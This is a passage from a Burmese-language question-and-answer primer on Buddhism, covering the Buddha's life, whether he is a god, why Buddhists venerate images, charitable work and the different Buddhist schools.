ေျဖ - ဒႆနပညာဆိုတာ အဂၤလိပ္စကား Philosophy ကို ဘာသာျပန္ထားတာပါ။ အဘိဓာန္မ်ား ဖြင့္ျပခ်က္အရ ဆိုရင္ "philo"ဆိုတာ “ခ်စ္ခင္ျခင္း ေမတၲာ“ လို႕ ဆိုလိုပါတယ္။ "sophy" ဆိုတာ “ပညာ“ လို႕ အဓိပၸါယ္ ရပါတယ္။ ဒီေတာ့ "Philosophy" ဆိုတာ “ပညာကို ခ်စ္ခင္ျခင္း“၊ သို႕မဟုတ္ “ေမတၲာႏွင့္ ပညာ“ လို႕ အဓိပၸါယ္ ရပါတယ္။ ဒီစကား ႏွစ္လံုးဟာ ဗုဒၶဘာသာရဲ႕ အဓိပၸါယ္ကို အျပည့္အ၀ ေဖၚျပႏိုင္ပါတယ္။ ဗုဒၶဘာသာ တရားက သဘာ၀တရားကို ၾကည္လင္ျပတ္သားစြာ ကြၽႏု္ပ္တို႕ နားလည္ ႏိုင္ေရးအတြက္ အျပည့္စံုဆံုး ဥာဏ္ပညာအရည္အေသြး တိုးတက္ေအာင္ ႀကိဳးစားၾကဖို႕ သင္ေပးပါတယ္။ ၿပီးေတာ့ ကြၽႏု္ပ္တို႕ဟာ သတၱ၀ါအားလံုးရဲ႕ မိတ္ေဆြသဖြယ္ ျဖစ္ႏိုင္ေစရန္ ေမတၱာ က႐ုဏာတရား တိုးပြါးေအာင္ ႀကိဳးစားဖို႕ကိုလဲ သင္ေပးပါတယ္။ ဒါေၾကာင့္ ဗုဒၶဘာသာကို အေတြးအျမင္ ပညာတစ္ရပ္လို႕ ဆိုႏိုင္ေသာ္လဲ သာမာန္ အေတြးအျမင္ပညာ မဟုတ္ပါဘူး။ ျမင့္ျမတ္ေသာ အေတြးအျမင္ပညာ (Supreme Philosophy) သာ ျဖစ္ပါတယ္။
(၃) ေမး - ဗုဒၶဆိုတာ ဘယ္သူပါလဲ။
ေျဖ - ခရစ္မေပၚမီ ၅၆၃ ခုႏွစ္မွာ အိႏၵိယျပည္ ေျမာက္ပိုင္း (ကပိလ၀တ္ျပည္) ဘုရင္ သုေဒၶါဓနႏွင့္ မိဖုရား မယ္ေတာ္မာယာတို႕မွ သားကေလးတစ္ေယာက္ ဖြားျမင္ပါတယ္။ ဒီမင္းသားကေလးဟာ စည္းစိမ္ဥစၥာ ျပည့္ျပည့္စံုစံုႏွင့္ ႀကီးျပင္းလာရေသာ္လဲ ေနာက္ဆံုးမွာ ေလာကီစည္းစိမ္ဥစၥာေတြဟာ ခ်မ္းသာေပ်ာ္ရႊင္မႈကို မေပးႏိုင္ဘူးဆိုတာ ေတြ႕လာရတယ္။ ဒီမင္းသားဟာ သူ႕ပတ္၀န္းက်င္မွာ သူေတြ႕ျမင္ရတဲ့ ဆင္းရဲဒုကၡေတြေၾကာင့္ အႀကီးအက်ယ္ စိတ္မခ်မ္းမသာျဖစ္ၿပီး လူသားတို႕ ခ်မ္းသာေရးအတြက္ ေသာ့ခ်က္ကိုရွာဖို႕ ဆံုးျဖတ္လိုက္တယ္။ အသက္၂၉ႏွစ္ ရွိတဲ့အခါ ဒီမင္းသားဟာ သူ႕ရဲ႕ၾကင္ယာေတာ္ (ယေသာဓရာ)ႏွင့္ သားေတာ္(ရာဟုလာ)ကို ထားခဲ့ၿပီးေတာ့ အဲဒီေခတ္က ဘာသာေရး ဆရာႀကီးမ်ားရဲ႕ အထံမွာ အသိပညာ ဆည္းပူးဖို႕ ထြက္လာခဲ့တယ္။ သူတို႕ဟာ ဒီမင္းသားကို ေျမာက္ျမားစြာ သင္ၾကား ေပးၾကေသာ္လဲ သူတို႕ကိုယ္တိုင္ ဆင္းရဲဒုကၡရဲ႕ အေၾကာင္းရင္း ဇာစ္ျမစ္ကို မသိၾကတဲ့အတြက္ ဒီဆင္းရဲဒုကၡကို ဘယ္လို ေက်ာ္လြန္ေအာင္ လုပ္ႏိုင္တယ္ဆိုတာကိုလဲ မသိၾကဘူး။ သိဒၡတၳမင္းသားဟာ (ဥ႐ုေ၀လေတာ) မွာ ေျခာက္ႏွစ္ ၾကာေအာင္ ေလ့လာ ပြါးမ်ား အားထုတ္ၿပီးတဲ့ အခါမယ္ အ၀ိဇၨာကို ပယ္ခြါႏိုင္တဲ့အတြက္ (အမွန္တရားကို) ထိုးထြင္းသိျမင္သြားပါတယ္။ အဲဒီအခ်ိန္ကစၿပီး သူ႕ကို “ဗုဒၶ“ (ကိေလသာတည္းဟူေသာ အိပ္ေပ်ာ္ျခင္းမွ) “ႏိုးလာသူ“လို႕ ေခၚေ၀ၚ သမုတ္ၾကပါတယ္။ ဗုဒၶရွင္ေတာ္ ျမတ္ဘုရားဟာ အဲဒီအခ်ိန္မွစၿပီး ၄၅ႏွစ္ပတ္လံုး အိႏၵိယျပည္ ေျမာက္ပိုင္းမွာ သူေတြ႕သိထားတဲ့ တရားေတာ္မ်ားကို လွည့္လည္ေဟာေျပာ ခဲ့ပါတယ္။
(မွတ္ခ်က္ ။ ။ ဥ႐ုေ၀လေတာ၌ ဒုကၠရစရိယာ ေျခာက္ႏွစ္ၾကာ က်င့္စဥ္က ဘုရား မျဖစ္ေသးပါ။ ထိုအက်င့္မွားကို စြန္႕၍ အာနာပါနစ်ာန္ အေျခခံလ်က္ မဂၢင္ရွစ္တန္ ပြါးမွသာ ဘုရားအျဖစ္သို႕ ေရာက္ပါသည္။) ရွင္ေတာ္ျမတ္ဘုရားရဲ႕ ႀကီးမားလွတဲ့ မဟာ က႐ုဏာေတာ္ႏွင့္ ခႏၲီတရားေၾကာင့္ မ်ားစြာေသာ လူတို႕ဟာ တပည့္သာ၀ကအျဖစ္ ခံယူၾကပါတယ္။ သက္ေတာ္ ရွစ္ဆယ္ ျပည့္ေတာ္မူတဲ့အခါ သဘာ၀အေလ်ာက္ အိုျခင္းတရား၊ နာျခင္းတရားမ်ား ဖိစီးႏွိပ္စက္ ခံရေသာ္လဲ ခ်မ္းေျမ႕ေအးၿငိမ္းလ်က္ပင္ ေနာက္ဆံုးမွာ ပရိနိဗၺာန္၀င္စံေတာ္ မူပါတယ္။
(၄) ေမး - ဗုဒၶဟာ သူ႕ရဲ႕ၾကင္ယာေတာ္နဲ႕ သားေတာ္ကို ပစ္ထားခဲ့တဲ့အတြက္ တာ၀န္မဲ့ရာ မေရာက္ဘူးလား။
ေျဖ - ဗုဒၶျမတ္စြာဟာ သူ႕ရဲ႕ ၾကင္ယာေတာ္နဲ႕ သားေတာ္ကို လြယ္လြယ္နဲ႕ ပစ္ထားႏိုင္ခဲ့တာ မဟုတ္ပါဘူး။ သူအခ်ိန္ အၾကာႀကီး စဥ္းစားၿပီး တြန္႕ဆုတ္တြန္႕ဆုတ္ ျဖစ္ေနခဲ့ပါတယ္။ ေနာက္ဆံုးက်မွ သူ႕မိသားစုကို ေကြၽးေမြးေစာင့္ေရွာက္ တာထက္ တေလာကလံုးရဲ႕ အက်ိဳးကို ေဆာင္ရြက္တာက ပိုၿပီး အက်ိဳး ႀကီးမားတယ္လို႕ ဆံုးျဖတ္ၿပီး ဒီလမ္းကို ေရြးခ်ယ္လိုက္တာပါပဲ။ ႀကီးမားတဲ့ မဟာ က႐ုဏာေတာ္က ဗုဒၶျမတ္စြာကို တေလာကလံုးရဲ႕ အက်ိဳးကို ေဆာင္ေစတာပါပဲ။ ဗုဒၶျမတ္စြာရဲ႕ ကိုယ္က်ိဳးစြန္႕ၿပီး အဆင္းရဲအပင္ပန္း ခံမႈေၾကာင့္ တေလာကလံုး ႀကီးမားတဲ့ အက်ိဳးကို အခုတိုင္ ခံစားေနၾကရတာ ျဖစ္ပါတယ္။ ဒါကိုၾကည့္ရင္ ဗုဒၶျမတ္စြာဟာ တာ၀န္မမဲ့ေၾကာင္း ထင္ရွားပါတယ္။ ဒါဟာ အႀကီးမားဆံုးေသာ စြန္႕လႊတ္မႈ ႀကီးပါပဲ။
(၅) ေမး - ဗုဒၶက ပရိနိဗၺာန္ စံသြားၿပီဆိုေတာ့ သူက ကြၽႏု္ပ္တို႕ကို ဘယ္လို ကူညီႏိုင္ပါသလဲ။
ေျဖ - လွ်ပ္စစ္ဓါတ္ကိုေတြ႕ရွိတဲ့ မုိက္ကယ္ ဖာရာေဒး ဟာ ကြယ္လြန္သြားပါၿပီ။ သို႕ေသာ္လဲ သူ႕ရဲ႕ ေတြ႕ရွိခ်က္က ကြၽႏု္ပ္တို႕ကို အခုတိုင္ ကူညီေနပါတယ္။ ေရာဂါေပါင္း မ်ားစြာကို ကုသတဲ့ ကုထံုးေတြကို ေတြ႕ရွိတဲ့ လူး၀စ္ပါးစ္ခ်ား ဟာလဲ ကြယ္လြန္သြားပါၿပီ။ သို႕ေသာ္လဲ သူေတြ႕ရွိတဲ့ ကုထံုးေတြက အခုတိုင္ အသက္ေပါင္း မ်ားစြာကို ကယ္ေနဆဲပါပဲ။ ေက်ာ္ၾကားတဲ့ အႏုပညာ မ်ားစြာကို တီထြင္ ဖန္တီးခဲ့တဲ့ လီယိုနာဒိုဒါဗင္ခ်ီ ဟာလဲ ေသသြားပါၿပီ။ သို႕ေသာ္လဲ သူဖန္တီးခဲ့တဲ့ အႏုပညာေတြက လူေတြကို အခုတိုင္ ေပ်ာ္ရႊင္မႈ ေပးေနဆဲပါပဲ။ ျမင့္ျမတ္တဲ့ ပုဂၢိဳလ္ႀကီးမ်ားနဲ႕ အာဇာနည္ ပုဂၢိဳလ္ႀကီးမ်ား ကြယ္လြန္သြားၾကတာ ရာစုႏွစ္ေပါင္းမ်ားစြာ ၾကာေသာ္လဲ သူတို႕အေၾကာင္းကို ကြၽႏု္ပ္တို႕ ဖတ္႐ႈရတဲ့အခါမွာ သူတို႕လို ေနထိုင္ ျပဳမူလိုစိတ္မ်ား ကြၽႏု္ပ္တို႕ သႏၲာန္မွာ တဖြားဖြား ေပၚလာပါတယ္။ ဟုတ္ပါတယ္။ ဗုဒၶျမတ္စြာ ပရိနိဗၺာန္ စံတာဟာ ႏွစ္ေပါင္း ၂၅၀၀ ေက်ာ္ ၾကာသြားပါၿပီ။ သို႕ေသာ္လဲ ရွင္ေတာ္ျမတ္ဘုရားရဲ႕ တရားေတာ္မ်ားဟာ အခုတိုင္ ကူညီေနဆဲပါပဲ။ ဗုဒၶျမတ္စြာရဲ႕ နမူနာေကာင္းေတြက လူေတြကို အခုတိုင္ အားတက္ေစတုန္းပါပဲ။ သူ႕စကားေတာ္ေတြက အခုတိုင္ လူေတြရဲ႕ ဘ၀ေတြကို ေျပာင္းလဲေစတုန္းပါပဲ။ ဗုဒၶျမတ္စြာမွာသာလွ်င္ ပရိနိဗၺာန္စံၿပီးေနာက္ ရာစုႏွစ္ေပါင္းမ်ားစြာ ၾကာသည့္တိုင္ေအာင္ ဒီလိုစြမ္းအားမ်ား ရွိေနႏိုင္တာ ျဖစ္ပါတယ္။
(၆) ေမး - ဗုဒၶဟာ ထာ၀ရဘုရား (God) လား။
ေျဖ - ဗုဒၶျမတ္စြာဟာ ထာ၀ရဘုရား မဟုတ္ပါဘူး။ ဗုဒၶျမတ္စြာက သူဟာ ထာ၀ရဘုရားလို႕ျဖစ္ေစ၊ ထာ၀ရဘုရားရဲ႕ သားေတာ္လို႕ျဖစ္ေစ၊ ထာ၀ရဘုရားက လႊတ္လိုက္တဲ့ တမန္ေတာ္လို႕ျဖစ္ေစ မမိန္႕ၾကားပါဘူး။ ဗုဒၶျမတ္စြာဟာ အလံုးစံု ျပည့္စံုတဲ့ လူသား တစ္ဦးပါပဲ။ ဒါေၾကာင့္ သူ႕လို ကြၽႏု္ပ္တို႕ ႀကိဳးစားလွ်င္ ကြၽႏု္ပ္တို႕လဲ သူ႕လိုပဲ အလံုးစံု ျပည့္စံုသူမ်ား ျဖစ္ႏိုင္ေၾကာင္း မိန္႕ၾကားေတာ္ မူပါတယ္။
(၇) ေမး - ဗုဒၶဟာ ထာ၀ရဘုရား မဟုတ္ရင္ ဘာေၾကာင့္ သူ႕ကို လူေတြက ရွိခိုးကိုးကြယ္ေနၾကသလဲ။
ေျဖ - ကိုးကြယ္နည္း အမ်ိဳးမ်ိဳး ရွိပါတယ္။ တခ်ိဳ႕က တစ္စံုတစ္ခုေသာ တန္ခိုးရွင္ဘုရား (God) ကို ကိုးကြယ္တဲ့အခါ အဲဒီဘုရားကို ခ်ီးက်ဴးေထာပနာ ျပဳၾကတယ္။ ဂုဏ္ျပဳၾကတယ္။ တစ္စံုတစ္ရာ ပူေဇာ္ပသ ၾကတယ္။ ကိုယ္လိုတာကို ဘုရားဆီမွာ ေတာင္းၾကတယ္။ အဲဒီလို လုပ္ၾကတာကေတာ့ မိမိတို႕ရဲ႕ ခ်ီးက်ဴးေထာပနာသံကို အဲဒီဘုရားက ၾကားလိမ့္မယ္လို႕ ယံုၾကည္လို႕၊ ပူေဇာ္ပသ တာကို လက္ခံလိမ့္မယ္လို႕ ယံုၾကည္လို႕၊ ဆုေတာင္းတာကို ျဖည့္ဆည္းေပးလိမ့္မယ္လို႕ ယံုၾကည္လို႕ပါပဲ။ ဗုဒၶဘာသာ၀င္ေတြ ကေတာ့ ဒီလို ကိုးကြယ္ ဆည္းကပ္မႈ မ်ိဳးကို မလုပ္ၾကပါဘူး။ တျခား ကိုးကြယ္ ဆည္းကပ္မႈတစ္မ်ိဳးကေတာ့ မိမိတို႕ ေလးျမတ္ၾကည္ညိဳတဲ့ ပုဂၢိဳလ္ တစ္ဦးဦး သို႕မဟုတ္ တစ္စံုတစ္ရာကို ႐ိုေသသမႈ ဂါရ၀ ျပဳၾကတယ္။ ဆရာအခန္းထဲ ၀င္လာရင္ ေနရာက ထ ေပးၾကတယ္။ ဂုဏ္သေရရွိတဲ့ လူနဲ႕ေတြ႕ရင္လက္ဆြဲႏႈတ္ဆက္ၾကတယ္။ အမ်ိဳးသားသီခ်င္း တီးရင္ မတ္တပ္ရပ္ အေလးျပဳၾကတယ္။ ဒါေတြအားလံုးဟာ ႐ိုေသေလးစားမႈကို ျပတဲ့ အမူအရာေတြ ပါပဲ။ ေလးျမတ္ၾကည္ညိဳမႈကို ေဖၚျပၾကတာ ျဖစ္ပါတယ္။ ဒီလို အ႐ိုအေသ ဂါရ၀ျပဳၿပီး ရွိခိုး ကိုးကြယ္မႈဟာ ဗုဒၶဘာသာ၀င္မ်ား ျပဳလုပ္ၾကတဲ့ ရွိခိုး ကိုးကြယ္မႈမ်ိဳးပါပဲ။ တင္ပလႅင္ေခြ ထိုင္ၿပီး ရင္ခြင္ထက္မွာ လက္ႏွစ္ဖက္ကို ရြရြကေလးခ်ထားတဲ့ ဗုဒၶ႐ုပ္ပြါးေတာ္ရဲ႕ မဟာက႐ုဏာေတာ္ျဖင့္ ၾကည္လင္ လန္းဆန္းေနတဲ့ မ်က္ႏွာေတာ္ဟာ ကြၽႏု္ပ္တို႕ရဲ႕ သႏၲာန္မွာ ၿငိမ္းေအးမႈနဲ႕ ေမတၱာတရား တိုးပြါးေအာင္ ႀကိဳးစားၾကဖို႕ ကြၽႏု္ပ္တို႕ကို သတိေပး ေနပါတယ္။ အေမႊးတိုင္ရဲ႕ အေမႊးနံ႕က ကြၽႏု္ပ္တို႕ သႏၲာန္မွာ ေကာင္းမႈကုသိုလ္ေတြ ပ်ံ႕ႏွံ႕ေနေစဖို႕ သတိေပးေနပါတယ္။ ဆီမီးကေတာ့ ပညာဆီမီး တန္ေဆာင္ ထြန္းေျပာင္ေစဖို႕ သတိေပးေနပါတယ္။ ကပ္လွဴထားတဲ့ ပန္းမ်ားရဲ႕ ၫႈိးႏြမ္းေၾကြက်သြားတဲ့ သေဘာက ကြၽႏု္ပ္တို႕အား အနိစၥတရားကို သတိရေစပါတယ္။ ဗုဒၶ႐ုပ္ပြါးေတာ္ေရွ႕မွာ ဦးၫႊတ္ရွိခိုးျခင္းက ကြၽႏု္ပ္တို႕ကို တရားဓမၼ ေဟာေျပာၫႊန္ျပ ဆံုးမေတာ္မူတဲ့အတြက္ ဗုဒၶရွင္ေတာ္ ျမတ္ဘုရားရဲ႕ ဂုဏ္ေက်းဇူးေတာ္ကို ေလးျမတ္ေကာ္ေရာ္ ပူေဇာ္ျခင္း ျဖစ္ပါတယ္။ ဒါဟာ ဗုဒၶဘာသာ၀င္မ်ားရဲ႕ ရွိခိုးကိုးကြယ္မႈပါပဲ။
(၈) ေမး - ဗုဒၶဘာသာ၀င္မ်ားဟာ ႐ုပ္တုကို ကိုးကြယ္ၾကတယ္လို႕ တခ်ိဳ႕လူမ်ားက ေျပာတာ ၾကားဘူးပါတယ္။ ဟုတ္ပါသလား။
ေျဖ - ဒီလို အေျပာမ်ိဳးဟာ ဗုဒၶဘာသာကို နားလည္မွားေနတဲ့ လူေတြ ေျပာၾကတဲ့ စကားေတြပါ။ အဘိဓာန္မ်ားကေတာ့ ႐ုပ္တုကို ထာ၀ရဘုရား(God) အျဖစ္နဲ႕ ရွိခုိးကိုးကြယ္ၾကတာကို ႐ုပ္တု ကိုးကြယ္မႈ လို႕ ဖြင့္ျပၾကပါတယ္။ သိၾကတဲ့အတိုင္းပဲ ဗုဒၶဘာသာ၀င္မ်ားဟာ ဗုဒၶျမတ္စြာကို ထာ၀ရဘုရားတစ္ပါး(God) အေနနဲ႕ ယံုၾကည္ သိမွတ္ၾကတာ မဟုတ္ပါဘူး။ ဒီေတာ့ ဗုဒၶဘာသာ၀င္မ်ားဟာ သစ္သား႐ုပ္တု၊ သံ႐ုပ္တု၊ ေၾကး႐ုပ္တု စသည္ကို ဘယ္မွာ ကိုးကြယ္ၾကပါမလဲ။ သို႕ေသာ္လဲ တစ္ခုေတာ့ ရွိပါတယ္။ ဘာသာတရားတိုင္းမွာ ဘာသာ၀င္တိုင္းဟာ အယူအဆ အမ်ိဳးမ်ိဳးကို ေဖၚျပဖို႕ အမွတ္လကၡဏာ(Symbol) အမ်ိဳးမ်ိဳးကို အသံုးျပဳၾကပါတယ္။ ဥပမာ - တာအိုဘာသာမွာဆိုရင္ ဆန္႕က်င္ဘက္ ႏွစ္ခုတို႕ရဲ႕ ညီၫႊတ္ ေပါင္းစည္းမႈကို ေဖၚျပဖို႕ရာ ယင္နဲ႕ယန္(Ying -Yang) ကို အမွတ္လကၡဏာအျဖစ္ အသံုးျပဳပါတယ္။ ဆစ္ဘာသာမွာ ဘာသာေရးဆိုင္ရာ ႐ုန္းကန္လႈပ္ရွားမႈကို ေဖၚျပဖို႕ရာ ဓားကို အမွတ္လကၡဏာအျဖစ္ အသံုးျပဳပါတယ္။ ခရစ္ယာန္ဘာသာမွာ ခရစ္ေတာ္ တည္ရွိျခင္းကို ေဖၚျပဖို႕ရာ ငါးကို အမွတ္လကၡဏာအျဖစ္ အသံုးျပဳၾကတယ္။ ခရစ္ေတာ္ရဲ႕ လူသားအတြက္ အသက္စြန္႕လႊတ္မႈကို ေဖာ္ျပဖို႕ရာ လက္၀ါးကပ္တိုင္ကို အမွတ္လကၡဏာအျဖစ္ အသံုးျပဳပါတယ္။ ဗုဒၶဘာသာမွာ လူသားတစ္ဦးရဲ႕ အလံုးစံုၿပီးျပည့္စံုမႈကို
ေဖၚျပဖို႕ရာ ဘုရား႐ုပ္တုေတာ္ကို အမွတ္လကၶဏာအျဖစ္ အသံုးျပဳၾကပါတယ္။ ဗုဒၶ႐ုပ္တုေတာ္က ဗုဒၶရဲ႕ တရားေတာ္မ်ားမွာ ပါ၀င္တဲ့ လူသားနဲ႕ သက္ဆိုင္တဲ့ သဘာ၀မ်ားကို ကြၽႏ္ုပ္တို႕အား သတိရေစပါတယ္။ ဗုဒၶဘာသာဟာ လူသားကို ဗဟိုျပဳပါတယ္ ထာ၀ရဘုရား သိ ကို ဗဟိုမျပဳဘူး ဆိုတဲ့ အခ်က္နဲ႕ အလံုးစံု ၿပီးျပည့္စံုေရးနဲ႕ အသိမွန္ အျမင္မွန္ ရေရးအတြက္ ဗဟိဒၶသႏၲာန္ကို မၾကည့္ရဘူး၊အဇၩတၱသႏၲာန္ကိုသာ ၾကည့္ရမယ္ဆိုတဲ့ အခ်က္ကိုလဲ ကြၽႏ္ုပ္တို႕အား သတိရေစပါတယ္။ ဒါေၾကာင့္ ဗုဒၶဘာသာ၀င္ေတြဟာ ႐ုပ္တုကို ရွိခိုးကိုးကြယ္တယ္ဆိုတဲ့ စြပ္စြဲေျပာဆိုခ်က္ ေတြဟာ မမွန္ပါဘူး။
(၉) ေမး - တ႐ုတ္ ဗုဒၶဘာသာ ဘုရားေက်ာင္းေတြ ထဲမွာ စကၠဴပိုက္ဆံေတြကို မီး႐ႈိ႕တာေတြ၊ ၿပီးေတာ့ တျခား ထူးထူးဆန္းဆန္း လုပ္ၾကတာ ေတြ႕ၾကရပါတယ္။ အဲဒါေတြကို ဘာေၾကာင့္ လုပ္ၾကပါသလဲ။
ေျဖ - ကြၽႏု္ပ္တို႕ဟာ ကြၽႏု္ပ္တို႕ နားမလည္တဲ့ အရာမ်ားကို ေတြ႕ရတဲ့အခါ အဲဒါေတြကို ကြၽႏု္ပ္တို႕အတြက္ ထူးဆန္းေနတတ္ပါတယ္။ အဲဒီလိုဟာေတြကို အထူးအဆန္း ေတြပဲလို႕ အမွတ္တမဲ့ ဘာသိဘာသာ မေနပဲ အဲဒါေတြရဲ႕ အဓိပၸါယ္ေတြကို ရွာေဖြဖို႕ ႀကိဳးစားသင့္ၾကပါတယ္။ မွန္ပါတယ္၊ တစ္ခါတစ္ရံမွာ ဗုဒၶဘာသာ၀င္ေတြ လိုက္နာ လုပ္ေဆာင္ေနၾကတာေတြဟာ ဗုဒၶတရားေတာ္မွာ အေျခမခံပဲ နားလည္မွားမႈနဲ႕ အမ်ားယံုၾကည္ လက္ခံထားတဲ့ အစြဲအလမ္းေပၚမွာ အေျခခံထားတာ ေတြ႕ရတတ္ပါတယ္။ ဒီလိုကိစၥေတြဟာ ဗုဒၶဘာသာ တစ္ခုတည္းမွာသာ မဟုတ္ပါဘူး။ ဘာသာတိုင္းမွာပဲ ရံဖန္ရံခါ ေတြ႕ရတတ္ပါတယ္။ ဗုဒၶျမတ္စြာ တရားေတာ္မ်ားကို ရွင္းလင္းျပတ္သားစြာ အေသးစိတ္ ေဟာျပေတာ္မူပါတယ္။ အဲဒါကိုမွ ျပည့္ျပည့္စံုစံု နားမလည္ရင္ေတာ့ ဗုဒၶျမတ္စြာကို အျပစ္ဆိုလို႕ မျဖစ္ႏိုင္ပါဘူး။ ဒါနဲ႕ပတ္သက္လို႕ မွတ္သားဖြယ္ အဆံုးအမ တစ္ခုကေတာ့ “ေရာဂါေ၀ဒနာ ခံစားေနရေသာ လူတစ္ေယာက္သည္ ေဆးဆရာအထံမွ ေဆးကုသမႈ ခံယူဖို႕ လြယ္ကူပါလ်က္နဲ႕ ကုသမႈ မခံယူလွ်င္ ေဆးဆရာ၏ အျပစ္မဟုတ္ေပ။ ထို႕အတူပင္ ကိေလသာေရာဂါ အဖိစီး အႏွိပ္စက္ခံေနရသူသည္ ျမတ္စြာဘုရား၏ တရားေတာ္မ်ား ရွိေနပါလ်က္နဲ႕ တရားေဆးျဖင့္ မကုစားလွ်င္ ျမတ္စြာဘုရား၏ အျပစ္မဟုတ္ေပ။” ဗုဒၶဘာသာကိုပဲျဖစ္ေစ၊ တျခား ဘာသာတရားကိုပဲျဖစ္ေစ အဲဒီဘာသာတရားအေၾကာင္း ေကာင္းေကာင္း နားမလည္သူမ်ားက အမွား၊ အမွန္၊ အဆိုး၊ အေကာင္းကို မဆံုးျဖတ္သင့္ပါဘူး။
(၁၀) ေမး - ဗုဒၶဘာသာ၀င္ေတြ ကုသိုလ္ျဖစ္ လုပ္ငန္းေတြ လုပ္ၾကတာ သိပ္မၾကားမိပါဘူး။ အဲဒါ ဘာေၾကာင့္လဲ။
ေျဖ - ဗုဒၶဘာသာ၀င္ေတြလဲ ကုသိုလ္ျဖစ္ လုပ္ငန္းေတြ လုပ္ၾကပါတယ္။ သင္မၾကားမိတာကေတာ့ ဗုဒၶ ဘာသာ၀င္မ်ားဟာ သူတို႕လုပ္တဲ့ ကုသိုလ္ေကာင္းမႈေတြ အေၾကာင္းကို ၀ါၾကြားေျပာဆိုဖို႕ မလိုဘူးလို႕ ယူဆထားၾကလို႕ ျဖစ္ပါလိမ့္မယ္။ ႏွစ္ေပါင္းေတာ္ေတာ္ၾကာဆီက ဂ်ပန္ ဗုဒၶဘာသာ ေခါင္းေဆာင္ တစ္ေယာက္ျဖစ္တဲ့ နစ္ခိုနိရ၀ါႏို ဟာ ဘာသာတရားအားလံုး ေပါင္စည္းညီၫြတ္မႈ တိုးတက္ေရးကို လုပ္ေဆာင္တဲ့အတြက္ (Templeton Prize) တင္ပယ္လ္တန္ဆုကုိ ရရွိပါတယ္။ အလားတူပဲ ထိုင္းဗုဒၶဘာသာ ဘုန္းေတာ္ႀကီး တစ္ပါးဟာ မူးယစ္ေဆး စြဲသူမ်ားကို ကုသရာမွာ ထူးခြၽန္တဲ့အတြက္ မက္ေဆးေဆး ဆုကို ရရွိခဲ့ပါတယ္။ ၁၉၈၇ ခုႏွစ္တုန္းကလဲ အရွင္ ကႏၲယပိ၀တ္ ဆိုတဲ့ ထိုင္းဘုန္းႀကီးတစ္ပါးဟာ ေက်းလက္ ေတာရြာမ်ားမွာရွိတဲ့ အေျခအေနမဲ့ ကေလးမ်ားကို ႏွစ္ေပါင္းမ်ားစြာၾကာေအာင္ ျပဳစု ေစာင့္ေရွာက္ခဲ့တဲ့ အတြက္ ]ေနာ္ေ၀ ကေလးမ်ား၏ ၿငိမ္းခ်မ္းေရးဆု} ကို ရရွိခဲ့ပါတယ္။ အေနာက္တိုင္း ဗုဒၶဘာသာအဖြဲ႕ (Western Buddhist Order) ဟာ အိႏၵိယျပည္မွာ ဆင္းရဲသားမ်ား အတြက္ ႀကီးမားက်ယ္ျပန္႕တဲ့ လူမႈေရး လုပ္ငန္းေတြကို လုပ္ေဆာင္ေနပါတယ္။ စာသင္ေက်ာင္းေတြ၊ ကေလးျပဳစု ေစာင့္ေရွာက္ေရး ဌာနေတြ၊ ေဆးေပးခန္းေတြ၊ တႏိုင္ စက္မႈလုပ္ငန္း အေသးစားေတြ တည္ေထာင္ၿပီး ျပဳစု ပ်ိဳးေထာင္ေပးေနပါတယ္။ ဗုဒၶဘာသာ၀င္မ်ားဟာ တျခား ဘာသာ၀င္မ်ားလိုပဲ သူတစ္ပါးကို အကူအညီ ေပးရတာဟာ သူတို႕ရဲ႕ ဘာသာတရား လိုက္နာက်င့္ၾကံမႈကို ေဖၚျပတာပဲလို႕ သိျမင္မွတ္ယူၾကပါတယ္။ သို႕ေသာ္လဲ ဒါေတြကို ကိုယ့္ကိုယ္ကို မထင္ေပၚေစပဲ တိုးတိုးတိတ္တိတ္ပဲ လုပ္သင့္တယ္လို႕ ယံုၾကည္ၾကပါတယ္။ ဒါေၾကာင့္ သူတို႕ရဲ႕ ကုသိုလ္ျဖစ္လုပ္ငန္းေတြ အေၾကာင္းကို သင္ သိပ္မၾကားရတာ ျဖစ္ပါလိမ့္မယ္။
(၁၁) ေမး - ဘာေၾကာင့္ ဗုဒၶဘာသာေတြ အမ်ိဳးမ်ိဳး ကြဲျပားေနပါသလဲ။
ေျဖ - လူေတြ စားသံုးၾကတဲ့ သၾကားေတြလဲ အမ်ိဳးမ်ိဳး ရွိၾကတာ မဟုတ္လား။ သၾကားျဖဴ၊ သၾကားညိဳ၊ ေက်ာက္သၾကား၊ သၾကားရည္၊ ေရခဲသၾကား စသည္ အမ်ိဳးမ်ိဳး ရွိၾကတာပဲ။ သို႕ေသာ္လဲ အားလံုးဟာ သၾကားခ်ည္းပဲ ၿပီးေတာ့ သၾကားတိုင္းဟာ ခ်ိဳၾကတာခ်ည္းပဲ။ မခ်ိဳတဲ့ သၾကားရယ္လို႕ မရွိဘူး။ ဒီလို သၾကားအမ်ိဳးမ်ိဳးအစားစား ထုတ္ၾကတာက သူတို႕ကို သံုးစြဲပံု သံုးစြဲနည္း အမ်ိဳးမ်ိဳး ရွိၾကလို႕ပါပဲ။
ဗုဒၶဘာသာလဲ ထို႕အတူပါပဲ။ ေထရ၀ါဒ ဗုဒၶဘာသာ၊ စ်င္ ဗုဒၶဘာသာ၊ အမိတာဘာ ဗုဒၶဘာသာ၊ ေယာဂါစာရ ဗုဒၶဘာသာ၊ ၀ဇီရယာန ဗုဒၶဘာသာ စသည္ျဖင့္ ကြဲျပားေနၾကေသာ္လဲ အႏွစ္သာရအားျဖင့္ အတူတူပါပဲ။ အဲဒီ အႏွစ္သာရက
ဘာလဲဆိုေတာ့ ကိေလသာမွ လြတ္ေျမာက္ျခင္း၊ ဆင္းရဲမွ လြတ္ေျမာက္ျခင္းဆိုတဲ့ အႏွစ္သာရပါပဲ။ ဗုဒၶဘာသာဟာ သူျဖစ္ေပၚရာ ယဥ္ေက်းမႈ အမ်ိဳးမ်ိဳးနဲ႕ ဟပ္မိေအာင္ အသြင္ အမ်ိဳးမ်ိဳးနဲ႕ ဖြံ႕ၿဖိဳး တိုးတက္လာခဲ့ပါတယ္။ အသစ္ျဖစ္တဲ့ မ်ိဳးဆက္ အသီးသီးနဲ႕ ကိုက္ညီေအာင္ ရာစုႏွစ္မ်ား တေလ်ာက္မွာ ဗုဒၶဘာသာကို ျပန္ၿပီး အဓိပၸါယ္ ဖြင့္ဆိုၾကပါတယ္။ ျပင္ပ ပံုပန္းသဏၭာန္ အေနနဲ႕ အမ်ိဳးမ်ိဳး ကြဲျပားေနတယ္လို႕ ထင္ရေသာ္လဲ အားလံုးရဲ႕ ဗဟိုခ်က္မ အႏွစ္သာရကေတာ့ သစၥာေလးပါး မဂၢင္ရွစ္ပါးပါပဲ။ ဗုဒၶဘာသာ 